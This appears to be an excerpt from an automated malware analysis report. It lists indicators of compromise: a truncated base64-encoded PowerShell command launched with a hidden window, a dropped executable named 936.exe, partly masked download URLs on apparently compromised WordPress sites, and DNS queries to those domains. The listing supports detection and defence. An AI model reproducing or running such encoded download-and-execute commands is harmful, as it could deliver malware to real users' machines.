Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAHcAZQBjAHYAdgBxAGIAYQA9ACcASwB4AG0AaABpAGMAZwBnACcAOwAkAFcAawBrAGMAcgBsAGEAYwB4AGUAdABsAGwAIAA9ACAAJwA5ADMANgAnADsAJABIAGQAeAB3AGwAbgBxAGoAZwB2AHEAbAA9ACcARAB0AGUAYwBmAGoAawBuAHEAYgA...
- %HOMEPATH%\936.exe
- http://to#####.#ommunitymonitoring.org/test/W15jPuDBv/
- http://mv###nte.com.br/wp-content/xypn/
- http://do####ria-lb.com/wp-admin/par/
- DNS ASK me####anandco.net
- DNS ASK to#####.#ommunitymonitoring.org
- DNS ASK rc#####seofworship.org
- DNS ASK mv###nte.com.br
- DNS ASK do####ria-lb.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAHcAZQBjAHYAdgBxAGIAYQA9ACcASwB4AG0AaABpAGMAZwBnACcAOwAkAFcAawBrAGMAcgBsAGEAYwB4AGUAdABsAGwAIAA9ACAAJwA5ADMANgAnADsAJABIAGQAeAB3AGwAbgBxAGoAZwB2AHEAbAA9ACcARAB0AGUAYwBmAGoAawBuAHEAYgA...' (with hidden window)